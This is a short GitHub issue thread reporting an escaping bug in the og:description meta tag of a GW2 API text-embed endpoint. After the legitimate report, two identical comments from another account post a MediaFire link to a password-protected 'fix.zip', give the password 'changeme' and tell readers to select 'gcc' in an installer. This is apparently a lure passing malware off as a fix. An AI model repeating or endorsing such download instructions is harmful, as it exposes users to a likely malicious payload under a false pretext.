### ISSUE TITLE
"Text embed" meta property escaping issue

### ISSUE THREAD

**Issue by Northburns** [HardstuckGuild/GW2-API-Issues#8]
# The Bug
I was checking out text embed endpoint, and I noticed that the head seems to have some escaping issue. 

```html
<meta property="og:description" content="Out—of—my—way. We" ve—got—a—prize—to—win!' />
```

# How To Reproduce
1. Send a request to https://gw2-api.hardstuck.gg/text/111/embed
2. See element `<meta property="og:description"` in head

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
